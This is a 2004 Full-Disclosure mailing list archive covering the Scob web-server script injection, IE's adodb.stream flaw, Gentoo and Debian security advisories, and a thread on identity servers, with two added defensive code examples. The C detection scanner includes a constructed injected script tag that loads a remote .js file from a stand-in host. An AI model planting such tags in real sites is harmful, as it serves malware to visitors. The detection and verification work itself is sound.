>http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html
>FSecure - Scob
>http://www.f-secure.com/v-descs/scob.shtml
>Computer Associates - JS.Toofer
>http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=39438
>
>CA provides the most information so far, indicating that the trojan are
>polymorphic variants of Win32.Webber. They claim the malicious web page
>exploits the Modal Dialog Zone Bypass discovered earlier in June. They
>also claim it is exploiting the vulnerability fixed by MS04-013 (MHTML).
>
>Questions:
>
>a) If you got a copy of the attacking page, can you send it to me?
>
>b) What site served up the document footer that caused you to be sent
>the malicious page?
>
>Cheers,
>Russ - NTBugtraq Editor
>
>-----
>NTBugtraq Editor's Note:
>
>Want to reply to the person who sent this message? This list is configured
>such that just hitting reply is going to result in the message coming to
>the list, not to the individual who sent the message. This was done to
>help reduce the number of Out of Office messages posters received. So if
>you want to send a reply just to the poster, you'll have to copy their
>email address out of the message and place it in your TO: field.
>-----
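Both the Peter Kruse heads-up earlier in the digest and the NTBugtraq alert above describe the same server-side symptom: pages (and, in Kruse's report, even .txt and .gif files) leave the server with a trailing script tag whose src points at a host that is not the site's own. The block below is an added detection example, not code from either alert or from any vendor: scan_document() takes a document as the server would hand it out and flags either a script tag in a file type that never carries markup, or a script loaded from a host other than the site's own. The host name www.example.com, the 203.0.113.5 address (a documentation address) and the sample documents are all constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp / strncasecmp (POSIX) */

/* Case-insensitive substring search; strcasestr() is not portable. */
static const char *find_ci(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++)
        if (strncasecmp(hay, needle, n) == 0)
            return hay;
    return NULL;
}

/* Copy the host part of an absolute URL (http://, https:// or //) into out.
 * Returns 0 for relative URLs, which are same-origin and not of interest here. */
static int url_host(const char *url, char *out, size_t n)
{
    const char *p = NULL;
    size_t i = 0;
    if (strncasecmp(url, "http://", 7) == 0)       p = url + 7;
    else if (strncasecmp(url, "https://", 8) == 0) p = url + 8;
    else if (strncmp(url, "//", 2) == 0)           p = url + 2;
    if (!p)
        return 0;
    while (p[i] && i + 1 < n && !strchr("/:'\"\\>", p[i]) && !isspace((unsigned char)p[i])) {
        out[i] = p[i];
        i++;
    }
    out[i] = '\0';
    return i > 0;
}

/* Inspect one document as the server would serve it.
 * Returns 2 when a <script> tag appears in a file type that never carries
 *           markup (the alerts report .txt and .gif files being altered),
 *         1 when a <script src=...> tag loads from a host other than own_host
 *           (that host is copied to ext_host),
 *         0 otherwise. */
static int scan_document(const char *name, const char *content,
                         const char *own_host, char *ext_host, size_t n)
{
    const char *ext = strrchr(name, '.');
    int is_markup = ext && (!strcasecmp(ext, ".htm") || !strcasecmp(ext, ".html")
                            || !strcasecmp(ext, ".asp"));
    const char *p = content;

    ext_host[0] = '\0';
    while ((p = find_ci(p, "<script")) != NULL) {
        const char *end, *src;
        if (!is_markup)
            return 2;
        end = strchr(p, '>');
        if (!end)
            end = p + strlen(p);
        src = find_ci(p + 7, "src");
        if (src && src < end) {
            src += 3;
            /* The injected tag quoted by Kruse was padded with spaces
             * ("SRC =' http://") to slip past naive filters, so tolerate
             * whitespace, '=' and either quote style before the URL. */
            while (src < end && (isspace((unsigned char)*src) || strchr("='\"\\", *src)))
                src++;
            if (url_host(src, ext_host, n) && strcasecmp(ext_host, own_host) != 0)
                return 1;
        }
        p = end;
    }
    return 0;
}

int main(void)
{
    /* Constructed samples; 203.0.113.5 is a documentation address, not an indicator. */
    const char *clean = "<html><body>hello<script src=\"/js/app.js\"></script></body></html>";
    const char *injected = "<html><body>hello</body></html>\n"
                           "<SCRIPT SRC =' http://203.0.113.5/shellxxx.js'></script>";
    char host[64];

    printf("clean:    %d\n", scan_document("index.html", clean, "www.example.com", host, sizeof host));
    printf("injected: %d (%s)\n",
           scan_document("index.html", injected, "www.example.com", host, sizeof host), host);
    printf("readme:   %d\n", scan_document("readme.txt", "text<script src='http://203.0.113.5/x.js'>",
                                           "www.example.com", host, sizeof host));
    return 0;
}
```

Run it over the files in the web root, or over pages fetched from the server (the footer mechanism in the alert above is applied at serve time, so fetching catches what a file scan of the content directory alone would miss), and treat any result other than 0 as something to look at by hand.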



 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 13:53:44 CDT


Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What does
multiple billions of dollars buy you today. Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explain what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

What is this gibberish? For the past 10 months the adodb.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition? Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this? Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones' won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure so-
called "intranet zone" and it can be guided there remotely.

What's happening here? Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com



 
[Full-Disclosure] Microsoft Identity Integration Server

From: Michael Schaefer (mbsmistrealm.com)
Date: Fri Jun 25 2004 - 14:35:51 CDT


We are thinking about trying out this technology.

Has anyone used this? Are there any known security risks?

M



 
RE: [Full-Disclosure] server administration

From: Black, Braden (BBlackVSCat.com)
Date: Fri Jun 25 2004 - 14:45:14 CDT


> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of harry
> Sent: Monday, June 21, 2004 6:59 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] server administration
>
>
> hi all,
>
> i know this is not really a security thing, so if someone
> could tell me
> where the correct place to ask is... i would really appreciate it...

http://www.infrastructures.org

Topics addressed on Infrastructures.org include the following (quoted from
the index page):
" * Remote management
    * Secure communications
    * Distributed Monitoring
    * Unattended network-based installation
    * Automatic host administration (no need to manually track or apply
changes to managed hosts)
    * Unified desktop and server management
    * Single System Image
    * Single Signon
    * Continuous, long-term live host management (no re-installation needed
to apply upgrades)
    * Ordered, validated changes to any given host
    * Prototype and class-based host definitions
    * A coherent framework for managing all of the above"

Their mailing list would be much more appropriate for your question, IMHO.

HTH,
- Braden



 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 11:01:34 CDT


Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of a sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What does
multiple billions of dollars buy you today. Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explain what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/securi
ty/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

What is this gibberish? For the past 10 months the adodb.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition? Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this? Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones" won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure
so-called "intranet zone" and it can be guided there remotely.

What's happening here. Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com



 
Re: [Full-Disclosure] Microsoft Identity Integration Server

From: Eric Paynter (ericarcticbears.com)
Date: Fri Jun 25 2004 - 16:03:19 CDT


On Fri, June 25, 2004 12:35 pm, Michael Schaefer said:
> Are there any known security risks?

It's made by Microsoft. Isn't that a significant security risk?

-Eric



 
[Full-Disclosure] [ GLSA 200406-20 ] FreeS/WAN, Openswan, strongSwan: Vulnerabilities in certificate handling

From: Thierry Carrez (koongentoo.org)
Date: Fri Jun 25 2004 - 15:50:01 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: FreeS/WAN, Openswan, strongSwan: Vulnerabilities in
            certificate handling
      Date: June 25, 2004
        ID: 200406-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN contain two bugs
when authenticating PKCS#7 certificates. This could allow an attacker
to authenticate with a fake certificate.

Background
==========

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN are Open Source
implementations of IPsec for the Linux operating system. They are all
based on the discontinued FreeS/WAN project.

Affected packages
=================

    -------------------------------------------------------------------
     Package                         /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  net-misc/freeswan                   < 2.04-r1             >= 2.04-r1
                                                               == 1.99-r1
  2  net-misc/openswan                   < 2.1.4                 >= 2.1.4
                                                             == 1.0.6_rc1
  3  net-misc/strongswan                 < 2.1.3                 >= 2.1.3
  4  net-misc/super-freeswan            <= 1.99.7.3             Vulnerable!

Description
===========

All these IPsec implementations have several bugs in the
verify_x509cert() function, which performs certificate validation, that
make them vulnerable to malicious PKCS#7 wrapped objects.

Impact
======

With a carefully crafted certificate payload an attacker can
successfully authenticate against FreeS/WAN, Openswan, strongSwan or
Super-FreeS/WAN, or make the daemon go into an endless loop.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All FreeS/WAN 1.9x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv "=net-misc/freeswan-1.99-r1"
    # emerge "=net-misc/freeswan-1.99-r1"

All FreeS/WAN 2.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/freeswan-2.04-r1"
    # emerge ">=net-misc/freeswan-2.04-r1"

All Openswan 1.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv "=net-misc/openswan-1.0.6_rc1"
    # emerge "=net-misc/openswan-1.0.6_rc1"

All Openswan 2.x users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/openswan-2.1.4"
    # emerge ">=net-misc/openswan-2.1.4"

All strongSwan users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-misc/strongswan-2.1.3"
    # emerge ">=net-misc/strongswan-2.1.3"

All Super-FreeS/WAN users should migrate to the latest stable version
of Openswan. Note that Portage will force a move for Super-FreeS/WAN
users to Openswan.

    # emerge sync

    # emerge -pv "=net-misc/openswan-1.0.6_rc1"
    # emerge "=net-misc/openswan-1.0.6_rc1"

References
==========

  [ 1 ] Openswan/strongSwan Authentication Bug
        http://lists.openswan.org/pipermail/dev/2004-June/000370.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA3I/4vcL1obalX08RAkFTAJ9G6U5OAw9poy1YiHAS6sKEf+KSFQCfQJx+
kgh6zpXu/VV8W77ZrkawRgA=
=m9Rn
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Microsoft Identity Integration Server

Valdis.Kletnieksvt.edu
Date: Fri Jun 25 2004 - 16:18:22 CDT


On Fri, 25 Jun 2004 15:35:51 EDT, Michael Schaefer <mbsmistrealm.com> said:

> Has anyone used this? Are there any known security risks?

(None of this is specific to the product, but all of it is stuff that we as an
industry keep re-botching over and over, so I'll mention it here anyhow...)

Three (ok, two and a half) come to mind:

1) There's an inherent "eggs in one basket" issue with *any* sort of
single-sign-on or single-identifier scheme. Be sure you understand all the
ramifications (all too many places don't think it ALL through).

2) After Microsoft's original "all your identity are belong to us" Passport,
it's just *too* easy to take a cheap shot at anything called a Microsoft
Identity Integration Server.... However, you *will* want to double-check how
you will interface this with any software at your site that doesn't believe in
The Microsoft Way (compare with the early days of Active Directory, and trying
to get a non-MS box to play nice....). This will undoubtedly lead to a
home-grown interface, which should have big screaming "AUDIT ME CAREFULLY"
stickers all over it....

3) *all* software has bugs. The Unix 'passwd' and 'login' programs have had
bugs. Kerberos had bugs. Yellow Pages had bugs. This product would be truly
unusual if it DIDN'T have bugs, especially at this point in its evolution. Be
sure you make plans for when (not if) a not-yet-publicly-known issue
surfaces....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA3JaecC3lWbTT17ARAug6AKCG1QhB1UW1PBNZsJddKEJLrV4wSgCgmo79
TcEHSlmYDPBYiX2Kt709jgg=
=Ah9f
-----END PGP SIGNATURE-----



 
[Full-Disclosure] [SECURITY] [DSA 525-1] New apache packages fix buffer overflow in mod_proxy

debian-security-announcelists.debian.org
Date: Fri Jun 25 2004 - 16:04:06 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 525-1                     security@debian.org
http://www.debian.org/security/                             Matt Zimmerman
June 24th, 2004                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : apache
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE Ids : CAN-2004-0492

Georgi Guninski discovered a buffer overflow bug in Apache's mod_proxy
module, whereby a remote user could potentially cause arbitrary code
to be executed with the privileges of an Apache httpd child process
(by default, user www-data). Note that this bug is only exploitable
if the mod_proxy module is in use.

Note that this bug exists in a module in the apache-common package,
shared by apache, apache-ssl and apache-perl, so this update is
sufficient to correct the bug for all three builds of Apache httpd.
However, on systems using apache-ssl or apache-perl, httpd will not
automatically be restarted.

For the current stable distribution (woody), this problem has been
fixed in version 1.3.26-0woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.31-2.

We recommend that you update your apache package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5.dsc
      Size/MD5 checksum: 668 728e205962ce1f02155cdeeae3b33596
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5.diff.gz
      Size/MD5 checksum: 299155 1f6504cbb56e55b0b67b5f911dc7601a
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz
      Size/MD5 checksum: 2586182 5cd778bbe6906b5ef39dbb7ef801de61

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody5_all.deb
      Size/MD5 checksum: 1129912 25ce8bbf0d753fa2b7a6e26c32f34789

  Alpha architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 395496 3681480dcd48c186aa3759e7a3aeabe0
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 925884 5deb71887a2bda9b51a84d52809ee96d
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_alpha.deb
      Size/MD5 checksum: 713886 ef9f3a034e9e995397c966c4ccb1ba14

  ARM architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 361138 20108dbf929f356aeb02d9adf40317c7
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 838572 bace0690140cc427ae34bc82a169ebd1
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_arm.deb
      Size/MD5 checksum: 544356 7ebfaea0a36f5661c82f8facbeb97199

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_i386.deb
      Size/MD5 checksum: 353488 0cb1fefd1daf2f3d3d74bc837e5dcee6
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_i386.deb
      Size/MD5 checksum: 822024 8f94a40d22fe86da3a513945745b46bd
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_i386.deb
      Size/MD5 checksum: 536422 18bec488eb2cb1f08234d063f3f018fc

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 436866 d73b9c14b39b1ce3cecdf25c4bb7b4d3
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 1012118 70574b1082626c0a63e4214ed2565965
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 949112 f455cbafb0be5fdbb61841e5f538f649

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 386164 2b45089dda26eba6c04313b636ac6d90
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 891114 b777e3971bfcf3fabcd8f00a6356f193
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 587064 b06b99057dce7e6501e716d65f8e75f9

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 347890 5d0c289522098f0f209df8444bb59b9e
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 820892 ec0656021adabae1022b461b882775b0
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 537236 280185606f9d5160454bc355818007fa

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 376464 a94cf93b405cf05372fc5d4f8bf7672f
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 843944 cb9e216b23a38b6d39296ce8b7ccf996
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 576406 7cfff44064ce0f2a02c9cbb97b068d83

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 376518 770cd115049bb2158e201549cc35520a
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 842596 3b85507e74eb531d61429befd63ece53
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 565592 2399177b56c48b52abe29ff6a48d5299

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 366994 679d12a1cef75a8aa5b3408ab5c0bd79
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 846036 7188ed09e4fc2a18fbb426516f57fe8b
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 558974 e42357dd7be10c9bbc2b36a865792f5b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 363750 c5e1a6db42fce09c1e4076640894cb4f
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 832464 3df3958b908e8f3acbe05f3e6acc032f
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 559418 ef6af5cb54b3f4da25be386bf2c89ec7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 360892 ed75775f79c9ed173c9e0baf2450be01
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 847292 b54050e25ac6166e390dd72018538bcf
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 544812 d3b7f0401f78d5f4d87e724d0f17f30f

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA3JMiArxCt0PiXR4RAmLdAJ49eumuVLVG5nUWBAeJxDGTGaxWewCgrP00
emklR9M6PUQ+AmL2wf1Q96w=
=Bf1i
-----END PGP SIGNATURE-----

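The advisory's upgrade instructions go straight from "wget url" to "dpkg -i file.deb", while the Size/MD5 checksum lines further down are what let an administrator confirm that the fetched file is the one the advisory describes. The following is an added example, not part of DSA 525-1 or of Debian's own tooling: a POSIX shell function that compares a downloaded .deb against the size and MD5 digest published in the advisory and only then hands it to dpkg. The file name, size and digest in the commented usage line are copied from the i386 section above; the function names verify_deb and install_if_verified are chosen here.

```shell
#!/bin/sh
# Added example (not part of DSA 525-1): check a downloaded Debian package
# against the "Size/MD5 checksum" line published in the advisory before
# installing it.

# verify_deb FILE EXPECTED_SIZE EXPECTED_MD5
# Returns 0 when both the byte size and the MD5 digest match the advisory,
# 1 otherwise (with the reason on stderr).
verify_deb() {
    file=$1
    expected_size=$2
    expected_md5=$3

    [ -f "$file" ] || { echo "missing file: $file" >&2; return 1; }

    # wc -c may pad with spaces on some systems; strip them.
    actual_size=$(wc -c < "$file" | tr -d ' ')
    # md5sum prints "<digest>  <file>"; keep only the digest.
    actual_md5=$(md5sum "$file" | cut -d' ' -f1)

    if [ "$actual_size" != "$expected_size" ]; then
        echo "size mismatch for $file: got $actual_size, advisory lists $expected_size" >&2
        return 1
    fi
    if [ "$actual_md5" != "$expected_md5" ]; then
        echo "MD5 mismatch for $file: got $actual_md5, advisory lists $expected_md5" >&2
        return 1
    fi
    return 0
}

# install_if_verified FILE EXPECTED_SIZE EXPECTED_MD5
# Runs dpkg -i only when verify_deb succeeds, so a truncated or substituted
# download never reaches the package manager.
install_if_verified() {
    verify_deb "$1" "$2" "$3" || return 1
    dpkg -i "$1"
}

# Usage with the i386 apache-common values from the advisory above:
# install_if_verified apache-common_1.3.26-0woody5_i386.deb 822024 8f94a40d22fe86da3a513945745b46bd
```

The digest comparison guards against a truncated download or a mirror serving a different file; what makes the digests themselves trustworthy is the PGP signature on the advisory, so verify that signature with the Debian security key before copying the numbers out of it. MD5 is no longer collision-resistant, so treat this as a download-integrity check rather than as proof of origin.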


 
RE: [Full-Disclosure] Microsoft and Security

From: Burnes, James (james.burnesgwl.com)
Date: Fri Jun 25 2004 - 16:38:56 CDT


One word,

m-o-n-o-p-o-l-y

And what are you going to do about it, punk?

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-
> adminlists.netsys.com] On Behalf Of http-equivexcite.com
> Sent: Friday, June 25, 2004 10:02 AM
> To: bugtraqsecurityfocus.com
> Cc: NTBugtraqlistserv.ntbugtraq.com; full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Microsoft and Security
>
>
>
> Where is Microsoft now "protecting their customers" as they love
> to bray? Should not someone in authority of this public company
> step forward and explain themselves at this time?
>
> All of a sudden panic is being created across the WWW with "IIS
> Exploit Infecting Web Site Visitors With Malware", "Mysterious
> Attack Hits Web Servers", "Researchers warn of infectious Web
> sites" all stemming from all news accounts from an
> unpatched "problem" with Internet Explorer now two weeks old and
> counting, which in fact in reality stems from 10 months ago,
> that being the adodb.stream safe for scripting control with
> write capabilities.
>
> What exactly is being done about this? Nothing. What does
> multiple billions of dollars buy you today. Nothing. However for
> $20 million you can almost fly to the moon.
>
> Someone ought to step forward and explain what exactly is
> happening at this public company. The great "protector of their
> customers". One might even suggest that their entire "security"
> mandate be re-examined. What exactly do they consider a
> vulnerability? Something that suits them or something that's
> cost effective to fix. So what, a few people lose their
> identities, have a few dollars extracted from their bank
> accounts, have their home pages reset, we'll fix it when it
> suits us as we have to be on budget this quarter. The Big Boss
> says $40 billion isn't enough this year.
>
> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible - even when using the product properly-to prevent an
> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> What is this gibberish? For the past 10 months the adodb.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition? Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this? Reads like the financial department conjured
> it up.
>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones" won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure
> so-called "intranet zone" and it can be guided there remotely.
>
> What's happening here. Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.
>
>
> --
> http://www.malware.com
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Microsoft and Security

From: Brian Toovey (btooveyigxglobal.com)
Date: Fri Jun 25 2004 - 15:47:08 CDT


anybody got a packet dump of the attack yet so we can regex out this
vuln against IIS?

It is quite terrible that this IE vuln has gone on now for two weeks -
from what I understand this is a "product feature", and that's why they
haven't addressed it.

We filter our local redirects at our proxy to protect against it. Your
thoughts on that method equiv?

Brian

On Fri, 2004-06-25 at 14:53, http-equivexcite.com wrote:

> Where is Microsoft now "protecting their customers" as they love
> to bray? Should not someone in authority of this public company
> step forward and explain themselves at this time?
>
> All of a sudden panic is being created across the WWW with "IIS
> Exploit Infecting Web Site Visitors With Malware", "Mysterious
> Attack Hits Web Servers", "Researchers warn of infectious Web
> sites" all stemming from all news accounts from an
> unpatched "problem" with Internet Explorer now two weeks old and
> counting, which in fact in reality stems from 10 months ago,
> that being the adodb.stream safe for scripting control with
> write capabilities.
>
> What exactly is being done about this? Nothing. What does
> multiple billions of dollars buy you today. Nothing. However for
> $20 million you can almost fly to the moon.
>
> Someone ought to step forward and explain what exactly is
> happening at this public company. The great "protector of their
> customers". One might even suggest that their entire "security"
> mandate be re-examined. What exactly do they consider a
> vulnerability? Something that suits them or something that's
> cost effective to fix. So what, a few people lose their
> identities, have a few dollars extracted from their bank
> accounts, have their home pages reset, we'll fix it when it
> suits us as we have to be on budget this quarter. The Big Boss
> says $40 billion isn't enough this year.
>
> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible - even when using the product properly - to prevent an
